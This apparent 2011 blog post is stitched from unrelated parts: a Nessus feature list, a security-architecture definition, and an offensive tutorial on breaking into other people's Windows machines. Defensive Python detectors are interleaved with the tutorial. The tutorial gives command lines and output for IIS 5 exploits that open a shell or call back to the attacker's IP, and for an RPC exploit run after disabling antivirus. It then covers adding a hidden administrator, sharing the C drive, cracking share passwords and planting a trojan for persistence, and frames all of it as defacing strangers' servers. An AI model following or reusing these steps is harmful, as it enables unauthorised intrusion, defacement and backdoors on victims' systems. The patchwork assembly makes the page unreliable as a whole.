Monday 31 October 2011

Nessus Security Scanner

By popular consensus, Nessus is among the best vulnerability scanners available. What’s more, it is released under the Gnu’s Not Unix (GNU) General
Public License (GPL) and can therefore be obtained and used at no charge.
The following are some of the features of Nessus:

Plugin Architecture.
Each security test is written as an external plugin. This
means that you can easily add your own tests without having to read the code
of the nessusd engine.

Nessus Attack Scripting Language.
Nessus Security Scanner includes Nessus
Attack Scripting Language (NASL), a language designed to write security tests
easily and quickly. (Security checks can also be written in the C programming
language.)

Up-to-Date Security Vulnerability Database.
Nessus focuses mostly on the
development of security checks for recent security holes.

Client/Server Architecture. 
Nessus Security Scanner is made up of two parts:
a server, which performs the attacks, and a client, which is the front end. You
can run the server and the client on different systems. That is, you can audit
your whole network from your personal computer, whereas the server performs
its attacks from the mainframe, which is “upstairs.” There are three clients: one
for X11, one for Win32, and one written in Java.

Test Capability on an Unlimited Number of Hosts Simultaneously
Depending on the power of the station on which you run the Nessus server, you can test 2,
10, or 40 hosts at the same time.

Smart Service Recognition. 
Nessus does not believe that target hosts will respect
the Internet Assigned Numbers Authority (IANA) port numbers. This means
that Nessus will recognize an FTP server running on a nonstandard port (say,
31337) or a Web server running on port 8080.

Multiple Services.
Imagine that you run two or more Web servers on your
host—one on port 80, the other on port 8080. Nessus will test the security of
both ports.

Cooperation Tests.
The security tests performed by Nessus cooperate so that
no useless work is done. If your FTP server does not offer anonymous logins,
then the anonymous-login security checks will not be performed.

Cracker Behavior.
Nessus does not trust that version x.y.z of a given piece of software
is immune to a security problem. Ninety-five percent of the security checks
actually perform their job, so expect Nessus to try to overflow your buffers, relay
some mail, and even crash your computer!
Complete Reports.
Nessus will not only tell you what’s wrong on your network,
but will, most of the time, tell you how to prevent crackers from exploiting the
security holes found, and will give you the risk level, from low to very high, of
each problem found.

Exportable Reports.
The Unix client can export Nessus reports as ASCII text,
LaTeX, HTML, “spiffy” HTML, and an easy-to-parse
file format.

Full SSL Support.
Nessus can test Secure Sockets Layer (SSL)-wrapped
services, such as HTTPS, SMTPS, and IMAPS. You can even supply Nessus
with a certificate so that it can integrate into a public key infrastructure (PKI).

Smart Plugins.
Nessus will determine which plugins should or should
not be launched against the remote host. This option is called “optimizations”.

Nondestructive.
If you don’t want to risk bringing down services on
your network, you can enable the “safe checks” option of Nessus, which makes
Nessus rely on banners rather than exploit real flaws to determine
whether a vulnerability is present.
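The “smart service recognition” and “safe checks” features above both come down to reading what a port actually says rather than trusting its number. The following Python is an added illustration written for this page, not Nessus code or a NASL script: it fingerprints a service from its greeting banner and flags when a recognised protocol answers on a port other than its IANA assignment. The banner patterns, the IANA_PORT table and the sample observations are my own constructed assumptions, chosen to cover the FTP-on-31337 and web-on-8080 cases the text mentions.

```python
import re
from typing import Dict, List, Optional, Tuple

# IANA-assigned ports for the protocols we can fingerprint; used only to
# report when a recognised service is listening somewhere unexpected.
IANA_PORT = {"ssh": 22, "ftp": 21, "smtp": 25, "http": 80, "pop3": 110, "imap": 143}

# Banner fingerprints (assumed for this example). SMTP is tested before FTP
# because both greet with "220"; an FTP banner rarely contains "SMTP".
BANNER_RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("ssh", re.compile(r"^SSH-\d\.\d+-")),
    ("smtp", re.compile(r"^220[ -].*\bE?SMTP\b", re.I)),
    ("ftp", re.compile(r"^220[ -].*ftp", re.I)),
    ("pop3", re.compile(r"^\+OK")),
    ("imap", re.compile(r"^\* OK")),
    ("http", re.compile(r"^HTTP/\d\.\d \d{3}")),
]


def identify_service(banner: str) -> Optional[str]:
    """Return the protocol a banner belongs to, or None if it is not recognised."""
    for name, pattern in BANNER_RULES:
        if pattern.search(banner):
            return name
    return None


def classify(port: int, banner: str) -> Dict[str, object]:
    """Fingerprint one (port, banner) observation and note a port mismatch."""
    service = identify_service(banner)
    expected = IANA_PORT.get(service) if service else None
    return {
        "port": port,
        "service": service,
        # Only a recognised service can be "on the wrong port".
        "nonstandard_port": service is not None and port != expected,
    }


def classify_all(observations: List[Tuple[int, str]]) -> List[Dict[str, object]]:
    return [classify(port, banner) for port, banner in observations]


# Constructed sample: (port, first line received) pairs, not real hosts.
SAMPLE_OBSERVATIONS = [
    (21, "220 ProFTPD Server ready."),
    (31337, "220 vsFTPd 2.0.1 ready"),
    (8080, "HTTP/1.1 200 OK"),
    (25, "220 mail.example.test ESMTP"),
    (2222, "SSH-2.0-OpenSSH_5.9"),
    (9999, "hello?"),
]

if __name__ == "__main__":
    for result in classify_all(SAMPLE_OBSERVATIONS):
        flag = " (non-standard port)" if result["nonstandard_port"] else ""
        print(f"port {result['port']}: {result['service'] or 'unknown'}{flag}")
```

Banner matching is exactly what the “safe checks” mode relies on, so the same limitation applies: a banner can be edited or suppressed, which is why an inventory built this way should be reconciled against what the host itself reports.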

Security Architecture

Security provided by IT systems can be defined as the IT system’s ability to protect the confidentiality and integrity of processed data, and to provide availability of the system and its data.

“IT Architecture” may be defined as a set of design artifacts that are relevant for describing an object such that it can be produced to requirements (quality) as well as maintained over the period of its useful life. The design artifacts describe the structure of components, their inter-relationships, and the principles and guidelines governing their design and evolution over time.

Consequently, the definition of “IT Security Architecture” may be given as:

The design artifacts that describe how the security controls are positioned and how they relate to the overall IT Architecture. These controls serve to maintain the system’s quality attributes, among them confidentiality, integrity and availability.

Security qualities are often considered non-functional requirements when systems are designed. In other words, they are not required for the system to meet its functional goals, such as processing financial transactions, but are needed for a given level of assurance that the system will perform to meet the functional requirements that have been defined.

In recent years there has been a trend towards a hierarchy of control objectives, controls and specific technical implementations of controls, which are implemented within a given security architecture in order to meet the security requirements.

Server Hacking

IIS (web server/web page) hacking

IIS is Microsoft's Internet server. It is very buggy and very exploitable. Defacing an IIS server is actually very easy. A lot of system administrators do not load patches on their IIS servers, so they are the people who get defaced (hacked). The IIS servers I will show you how to hack are IIS 4/5. IIS 6 is the industry standard at the moment, but there are still a lot of IIS 4/5 servers online. The way IIS servers are hacked is through buffer overflows and exploits: a certain piece of code is sent to the server, the server gets confused and grants you root access to the server. In the IIS hacking download section there are a lot of IIS hacking tools, making it easy for anyone to hack an IIS server. Not all web servers run on IIS; there is a lot of other web server software out there, like Apache. We will only be dealing with IIS servers.

Firstly you have to find an IIS server. Dreamscape IISscanner is very useful: it gives you the option to scan a certain IP or an IP range, and it will search and tell you if it finds any IIS servers and which version the host is running. Another way is to telnet to the IP on port 80. In the DOS prompt (Start, Run, CMD) type: telnet 196.35.45.21 80. It will open telnet and show you what IIS version the host is running. Web servers normally run on port 80, but it can be any other specified port.

If you find an IIS server, it's time to DEFACE it :) Go check my IIS hacking page for IIS hacking programs. We will use Jill-win32 first. It exploits an IIS 5 printer overflow. In the DOS prompt (Start, Run) run jill-win32. It will show you this:

iis5 remote .printer overflow.
dark spyrit < hack@me.org> / beavuh labs.
usage: jill-win32

An example of how to use it:

jill-win32 196.65.56.32 80 196.89.65.45 69 - 196.65.56.32 is the IIS server you want to deface, port 80 is the port the server runs its IIS service on, 196.89.65.45 is your IP, and port 69 is the port TFPD32 (available from this zip file) will listen on. When you run jill-win32 it will exploit a printer overflow on the IIS server and create a backdoor on the server which will connect to port 69 on your PC, where TFPD32 is listening.

Here is another example:

Download IISHack and do the following :

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969
IISHack Version 1.5
eEye Digital Security
http://www.hackme.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt.
C:\> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)


C:\WINNT\system32>whoami

NT AUTHORITY\SYSTEM
For those people who don't have a clue what's going on here, go the script kiddie way and download the other GUI (graphical user interface) IIS hacking programs from my IIS page and let the program deface the web page for you. There are a few IIS tutorials in the Windows Hacker misc section.
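From the defender's side, the transcript above leaves two things in the IIS logs: a request to the .printer ISAPI extension, and a copy of cmd.exe being served out of the executable /scripts directory. The Python below is an added example, not part of the original post or of any eEye tool; it parses the W3C extended log format that IIS writes, using the #Fields header to locate columns, and flags those two patterns. The log excerpt is constructed for the example and the field list it carries is assumed.

```python
from dataclasses import dataclass
from typing import Iterator, List, Tuple


@dataclass
class Finding:
    line_no: int
    client_ip: str
    uri: str
    reason: str


# Constructed IIS W3C extended log excerpt (not from a real server).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2011-10-31 10:01:02 10.0.0.5 GET /index.htm - 200
2011-10-31 10:01:09 10.0.0.9 GET /NULL.printer - 500
2011-10-31 10:01:15 10.0.0.9 GET /scripts/eeyehack.exe - 200
2011-10-31 10:02:00 10.0.0.5 GET /images/logo.gif - 200
2011-10-31 10:02:30 10.0.0.5 GET /scripts/counter.dll - 200
"""

# Web-exposed directories IIS treats as executable. A copy of cmd.exe placed
# here (as in the transcript above) is served like any other script.
EXECUTABLE_DIRS = ("/scripts/",)


def parse_w3c(text: str) -> Iterator[Tuple[int, dict]]:
    """Yield (line_no, column dict) for each data row, driven by the #Fields header."""
    fields = None
    for line_no, line in enumerate(text.splitlines(), start=1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data row before #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed row: skip rather than mis-assign columns
        yield line_no, dict(zip(fields, values))


def scan_iis_log(text: str) -> List[Finding]:
    """Flag .printer requests and executables fetched from a script directory."""
    findings: List[Finding] = []
    for line_no, row in parse_w3c(text):
        uri = row["cs-uri-stem"].lower()
        ip = row["c-ip"]
        if uri.endswith(".printer"):
            findings.append(Finding(line_no, ip, uri,
                                    "request to the IIS 5 .printer ISAPI extension"))
        elif uri.endswith(".exe") and uri.startswith(EXECUTABLE_DIRS):
            findings.append(Finding(line_no, ip, uri,
                                    "executable requested from a script directory"))
    return findings


def suspicious_clients(findings: List[Finding]) -> List[str]:
    """Distinct client addresses that produced at least one finding."""
    return sorted({f.client_ip for f in findings})


if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.client_ip} {f.uri} -> {f.reason}")
    print("clients to review:", ", ".join(suspicious_clients(scan_iis_log(SAMPLE_LOG))))
```

The .printer rule matches any request for that extension, so on a server that still has the extension mapped it will also fire on legitimate traffic; the useful signal is the combination with a 5xx status and a subsequent executable request from the same address, which is what the sample shows.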


MAC address

Getting a PC name, MAC address and user name logged on

So you would like to know someone's PC name, the MAC address of their network card, or the username currently logged onto the PC? It can be very useful to have this info on someone. Their PC name can be their own name or their company name. Their MAC address is the address of their network card, which is static, meaning it never changes. Their username can also be useful if you would like to know this person's name. All of this can only be retrieved if the person has a network card installed in their PC.

In the DOS prompt (Start, Run) type in "nbtstat -a IP"

Example: nbtstat -a 196.35.24.15. It will show something like this:

Local Area Connection 3:
Node IpAddress: [10.10.10.22] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
PCNAME <00> UNIQUE Registered
DOMAINNAME<00> GROUP Registered
PCNAME<03> UNIQUE Registered
PCNAME<20> UNIQUE Registered
DOMAINNAME <1E> GROUP Registered
USERNAME <03> UNIQUE Registered

MAC Address = 00-22-AE-43-33-30

It will show you the PC name, the domain name if it is connected to a domain, and the user name logged onto the PC. The MAC is static, meaning it never changes, which is useful for identifying someone. Your buddy attacks you, you check his IP and do an "nbtstat" on him, and you get his MAC address. So now if you check his PC and see it has the same MAC address, you know it was him attacking you.
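The nbtstat table above is easy to read by hand, but it is also a useful inventory source, for instance to confirm which machines on your own network expose file sharing (the <20> entry) and which have a logged-on user (a <03> entry that differs from the computer name). The parser below is an added example written for this page, not a tool from it; it extracts those fields from nbtstat -a output using the standard Microsoft NetBIOS suffix meanings. One caveat for anyone relying on it for attribution: the MAC it returns is whatever the adapter reports, and an adapter's address can be reconfigured in software, so treat it as one signal rather than proof of identity.

```python
import re
from typing import Dict, List, Optional

# One row of the "NetBIOS Remote Machine Name Table": name, <suffix>, type, status.
# nbtstat sometimes prints the suffix flush against the name, so the gap is optional.
ENTRY_RE = re.compile(r"^\s*(\S+?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)")
MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")

# Sample reproduced from the nbtstat transcript above (constructed values).
SAMPLE_NBTSTAT = """\
Local Area Connection 3:
Node IpAddress: [10.10.10.22] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
PCNAME <00> UNIQUE Registered
DOMAINNAME<00> GROUP Registered
PCNAME<03> UNIQUE Registered
PCNAME<20> UNIQUE Registered
DOMAINNAME <1E> GROUP Registered
USERNAME <03> UNIQUE Registered

MAC Address = 00-22-AE-43-33-30
"""


def parse_nbtstat(text: str) -> Dict[str, object]:
    """Summarise nbtstat -a output using standard NetBIOS suffix meanings.

    <00> UNIQUE  workstation (computer) name
    <00> GROUP   domain or workgroup name
    <03> UNIQUE  messenger service: the computer itself and each logged-on user
    <20> UNIQUE  file server service (file and printer sharing is running)
    """
    computer: Optional[str] = None
    domain: Optional[str] = None
    messenger_names: List[str] = []
    file_sharing = False
    mac: Optional[str] = None

    for line in text.splitlines():
        entry = ENTRY_RE.match(line)
        if entry:
            name, suffix, kind, status = entry.groups()
            suffix = suffix.upper()
            if status != "Registered":
                continue  # ignore conflicting or deregistered names
            if suffix == "00" and kind == "UNIQUE":
                computer = name
            elif suffix == "00" and kind == "GROUP":
                domain = name
            elif suffix == "20" and kind == "UNIQUE":
                file_sharing = True
            elif suffix == "03" and kind == "UNIQUE":
                messenger_names.append(name)
            continue
        found_mac = MAC_RE.search(line)
        if found_mac:
            mac = found_mac.group(1).upper()

    # The machine registers its own name with <03>; the remaining <03> UNIQUE
    # names are user accounts logged on at the console.
    logged_on = [n for n in messenger_names if n != computer]
    return {
        "computer": computer,
        "domain": domain,
        "logged_on_users": logged_on,
        "file_sharing": file_sharing,
        "mac": mac,
    }


if __name__ == "__main__":
    for key, value in parse_nbtstat(SAMPLE_NBTSTAT).items():
        print(f"{key:16} {value}")
```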

Hacking a PC with a exploit


What is an exploit? It takes advantage of a poorly coded piece of software, which you can use to gain access to the system. There are many exploits available for the various MS Windows versions out there. The Windows Hacker exploit download page has compiled exploits.

Now, if you're a n00b, you don't know how to compile an exploit; basically you need some programming experience, so go learn how to program. Most exploits are written in C++, so try Bloodshed Dev-C++, which you can use to compile exploits.

Read this tutorial about compiling exploits.


But you can download exploits which other people have already compiled. If someone updates their PC when new exploits come out, you can't exploit them, but if they don't update and install new patches, the chance you can exploit and gain access to their PC is big.

Check this example of how an exploit works:

KAHT II - MASSIVE RPC EXPLOIT

This is an exploit for Win2k/XP and it's already compiled; you can download it from the Windows Hacker exploits section.

This is an explanation of how to use it :

1. Get target IP, make sure it uses XP or 2k

2. Download the exploit tool
(make sure to deactivate your AV)

3. Run exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101

note: 192.168.1.101 is the target
192.168.1.100 <-- 100 here is target - 1

4. If successful, it will display the following
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------

Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...

Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

5. Now you are in the target's drive

6. Then you may add a user
C:\WINNT\system32>net user myuser mypassword /add
(myuser is the user name, mypassword the password)

7. Add the user to the Administrators group
C:\WINNT\system32>net localgroup Administrators myuser /add
(Administrators is the target group, myuser the user)

8. Sharing drive
C:\WINNT\system32>net share c=c:

9. Exit from the target... don't forget!
C:\WINNT\system32>exit

10. Use the shared drive: run cmd
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C: <--- enter myuser's password here

There you will now have a mapped drive to the target PC and an administrator account.
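Steps 6 to 8 above leave a very recognisable trail on the target: a local user created with net user, that user added to Administrators with net localgroup, and a drive root shared with net share, all within seconds of each other. The Python below is an added detection example, not from the original post; it runs over constructed process-creation records in a time|host|image|command-line format assumed for the example, and raises the severity when the account creation and the Administrators addition happen on the same host within a short window.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed process-creation records (time|host|image|command line).
# Not real telemetry; HOST1 mirrors steps 6-8 above, HOST2 is benign noise.
SAMPLE_EVENTS = r"""
2011-10-31T10:00:01|HOST1|C:\WINNT\system32\net.exe|net user myuser mypassword /add
2011-10-31T10:00:05|HOST1|C:\WINNT\system32\net.exe|net localgroup Administrators myuser /add
2011-10-31T10:00:09|HOST1|C:\WINNT\system32\net.exe|net share c=c:
2011-10-31T11:30:00|HOST2|C:\WINNT\system32\net.exe|net user /domain
2011-10-31T11:31:00|HOST2|C:\WINNT\system32\net.exe|net share
""".strip().splitlines()

# Command-line patterns for the three steps. "net user NAME [PASSWORD] /add",
# "net localgroup administrators NAME /add" and "net share NAME=X:".
USER_ADD = re.compile(r"^net(?:\.exe)?\s+user\s+(\S+)\s+(?:\S+\s+)?/add\b", re.I)
ADMIN_ADD = re.compile(r"^net(?:\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)
ROOT_SHARE = re.compile(r"^net(?:\.exe)?\s+share\s+(\S+?)=([a-z]:\\?)\s*$", re.I)

# Creation followed by group addition inside this window is treated as one action.
WINDOW = timedelta(minutes=30)


def detect_account_takeover(events: List[str]) -> List[Dict[str, str]]:
    """Return one finding per suspicious net.exe invocation, correlated per host."""
    created: Dict[tuple, datetime] = {}  # (host, user) -> time the user was created
    findings: List[Dict[str, str]] = []
    for record in events:
        ts, host, _image, cmd = record.split("|", 3)
        when = datetime.fromisoformat(ts)

        m = USER_ADD.match(cmd)
        if m:
            user = m.group(1).lower()
            created[(host, user)] = when
            findings.append({"host": host, "time": ts, "severity": "medium",
                             "detail": f"local user '{user}' created via net.exe"})
            continue

        m = ADMIN_ADD.match(cmd)
        if m:
            user = m.group(1).lower()
            born = created.get((host, user))
            recent = born is not None and when - born <= WINDOW
            findings.append({"host": host, "time": ts,
                             "severity": "high" if recent else "medium",
                             "detail": f"'{user}' added to Administrators"
                                       + (" shortly after being created" if recent else "")})
            continue

        m = ROOT_SHARE.match(cmd)
        if m:
            findings.append({"host": host, "time": ts, "severity": "high",
                             "detail": f"drive root {m.group(2)} shared as '{m.group(1)}'"})
    return findings


if __name__ == "__main__":
    for f in detect_account_takeover(SAMPLE_EVENTS):
        print(f"{f['time']} {f['host']} [{f['severity']}] {f['detail']}")
```

The correlation is deliberately keyed on host and user name rather than on the order of events alone, so an administrator who adds an existing account to the group stays at medium while the create-then-elevate pair seen in the transcript is promoted to high.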

Hacking a PC through NetBios shares

Finding PCs with shares over a LAN or over the Internet is very easy. Choose a certain IP range and use Netscan to search through the IP range for PCs with shares. A PC can only have shares if it is connected to a network or has file and printer sharing enabled, so mostly computers with a network card. If you find a computer with a share, use Windows to connect to that share.
Go START, RUN and type in "\\IP\sharename". Example: "\\198.55.77.216\c", or with the PC name "\\pc1\c". Then you will have access to the share, to delete, copy or rename files or directories, depending on what it was shared as, but most people share things with full access and no password. If you find a PC with shares but it asks you for a password when you try to connect, the easy way to crack it is with PQWak; this program brute-force cracks the password for you (Win9X only).

Windows NT/XP works through permissions, so if something is shared, it is shared with permissions to the folder, and permissions are given to a user name. But a lot of people make shares with full access to anyone. On Win2K/XP, accessing a share like the C$ share will ask you for a username and password if no password is specified by the person whose PC it is. Try the username Administrator with a blank password. Most people leave the administrator account password blank, an easy way to get onto their shares.

On Windows 2000 and XP you can use Venom or Starbrute to brute-force or dictionary-crack local accounts.

If you gain access to someone's hard drive, copy a trojan server file into their startup folder; then, when they reboot their PC, the trojan will run and you will have access to their PC through the trojan.
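The last paragraph describes the persistence step: a program dropped into the Startup folder runs at the next logon. A simple defence is a hash baseline of those folders, checked on a schedule. The Python below is an added example, not code from the page: windows_startup_folders lists the well-known per-user and all-users Startup locations on NT-family Windows, snapshot hashes one folder, and compare reports added, modified or removed files, rating any entry whose extension Windows will execute as high. The extension list is my own assumption of what counts as runnable, and the dictionaries in the usage below are constructed.

```python
import hashlib
import os
from pathlib import Path
from typing import Dict, List

# File types Windows runs from a Startup folder, directly or via the shell
# (assumed list for this example; extend it for your own environment).
AUTORUN_EXTENSIONS = {".exe", ".com", ".bat", ".cmd", ".vbs", ".js", ".scr", ".pif", ".lnk"}


def windows_startup_folders() -> List[Path]:
    """Well-known Startup locations that exist on this machine (empty list elsewhere)."""
    candidates: List[Path] = []
    appdata = os.environ.get("APPDATA")            # per-user, Vista and later
    if appdata:
        candidates.append(Path(appdata) / "Microsoft/Windows/Start Menu/Programs/Startup")
    programdata = os.environ.get("ProgramData")    # all users, Vista and later
    if programdata:
        candidates.append(Path(programdata) / "Microsoft/Windows/Start Menu/Programs/Startup")
    profile = os.environ.get("USERPROFILE")        # per-user, NT4/2000/XP layout
    if profile:
        candidates.append(Path(profile) / "Start Menu/Programs/Startup")
    return [p for p in candidates if p.is_dir()]


def snapshot(folder: Path) -> Dict[str, str]:
    """Map each regular file in the folder to its SHA-256 hex digest."""
    result: Dict[str, str] = {}
    for entry in sorted(folder.iterdir()):
        if entry.is_file():
            result[entry.name] = hashlib.sha256(entry.read_bytes()).hexdigest()
    return result


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> List[Dict[str, str]]:
    """Diff two snapshots; runnable additions and modifications are rated high."""
    findings: List[Dict[str, str]] = []
    for name, digest in current.items():
        runnable = Path(name).suffix.lower() in AUTORUN_EXTENSIONS
        severity = "high" if runnable else "low"
        if name not in baseline:
            findings.append({"file": name, "change": "added", "severity": severity})
        elif baseline[name] != digest:
            findings.append({"file": name, "change": "modified", "severity": severity})
    for name in baseline:
        if name not in current:
            # A removed entry is worth knowing about but cannot execute anything.
            findings.append({"file": name, "change": "removed", "severity": "low"})
    return findings


if __name__ == "__main__":
    # Constructed snapshots standing in for a saved baseline and a fresh scan.
    saved = {"desktop.ini": "aa"}
    now = {"desktop.ini": "aa", "update.exe": "bb"}
    for f in compare(saved, now):
        print(f"[{f['severity']}] {f['change']}: {f['file']}")
    for folder in windows_startup_folders():
        print(folder, snapshot(folder))
```

In practice the saved snapshot would be written to disk (a JSON file is enough) after a known-clean state and compared against a fresh snapshot of each folder on every run; anything rated high is a new autorun entry and should be examined before the next logon executes it.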